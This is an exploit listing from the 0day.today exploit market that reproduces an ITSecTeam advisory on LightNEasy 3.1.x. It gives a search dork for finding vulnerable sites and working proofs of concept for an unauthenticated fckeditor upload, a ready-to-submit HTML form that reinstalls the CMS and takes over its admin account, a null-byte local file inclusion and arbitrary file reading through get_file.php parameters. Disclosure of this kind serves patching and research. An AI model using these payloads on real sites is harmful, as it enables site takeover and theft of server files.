[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

LightNEasy 3.1.x Multiple Vulnerabilite

Author
Itsecteam
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11913
Category
web applications
Date add
21-04-2010
Platform
php
=======================================
LightNEasy 3.1.x Multiple Vulnerabilite
=======================================

##############################################################################
#Title:             LightNEasy 3.1.x Multiple Vulnerabilites                 #
#Vendor:            http://lightneasy.org/                                   #
#Dork:              "Powered by LightNEasy"                                  #
##############################################################################
#AUTHOR:            ITSecTeam                                                #
#Email:             Bug@ITSecTeam.com                                        #
#Website:           http://www.itsecteam.com                                 #
#Forum :            http://forum.ITSecTeam.com                               #
#Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability46.htm #
#Thanks:            r3dm0v3 [r3dm0v3_at_ymail.com]                           #
##############################################################################
 
#DESCRIPTION (by vendor):#####################################################
 LightNEasy, a simple and light Content Management System and Website Builder
 
 
#1-fckeditor Remote File Upload###############################################
 #Desc:
 Remote users can upload file without authentication.
 
 #POC:
 http://site.com/fckeditor/editor/filemanager/connectors/test.html
 
 
#2-Reinstallation#############################################################
 #Desc:
  After software installation it is still possible for remote users to reinstall
  the software without authentication.
 
 #Exploit:
  <html>
  <form name="form1" action="http://site.com/LightNEasy/install1.php" method="post"><table>
  <tr><td>Enter password:</td><td><input type="password" name="password" value="" /></td></tr>
  <tr><td>Repeat password:</td><td><input type="password" name="password1" value="" /></td></tr>
  <tr><td>Admin name:</td><td><input type="text" name="admin" value="" /></td></tr>
  <tr><td>Admin email:</td><td><input type="text" name="email" value="" /></td></tr>
  <tr><td>Website email:</td><td><input type="text" name="wemail" value="" /></td></tr>
  <tr><td>Tables prefix:</td><td><input type="text" name="prefix" value="LNE_" /></td></tr>
  <tr><td>Database system:</td><td><select name="database" ><option value="SQLite2">SQLite 2 (following fields empty)</option><option value="SQLite3">SQLite 3 (following fields empty)</option><option value="MySQL">MySQL</option></select></td></tr>
  <tr><td>Database name:</td><td><input type="text" name="databasename" value="" /></td></tr>
  <tr><td>MySQL login:</td><td><input type="text" name="databaselogin" value="" /></td></tr>
  <tr><td>MySQL password:</td><td><input type="text" name="databasepassword" value="" /></td></tr>
  <tr><td>MySQL host:</td><td><input type="text" name="databasehost" value="" /></td></tr>
  <tr><td>&nbps;</td><td><input type="submit" name="submit" value="Create Database" /></td></tr>
  </table></form>
  </html>
 
 
#3-Filemanager plugin Local File Inclusion####################################
 #Bug-file: /plugins/filemanager/get_file.php
   29:  if(!isset($language)) $language = 'en';
   30:  include("languages/lang_$language.inc"); //<---- vulnerable line!
 
 #Exploit:
  http://site.com/plugins/filemanager/get_file.php?language=[file_to_include]%00
 
 
#4-Filemanager plugin Local File Disclosure###################################
 #Bug-File:
   14:  if(isset($_REQUEST['file'])) $file = $_REQUEST['file'];
   ...
   56:  readfile($file);
 
 #EXPLOIT:
  http://site.com/plugins/filemanager/get_file.php?file=[file_to_read]



#  0day.today [2024-12-25]  #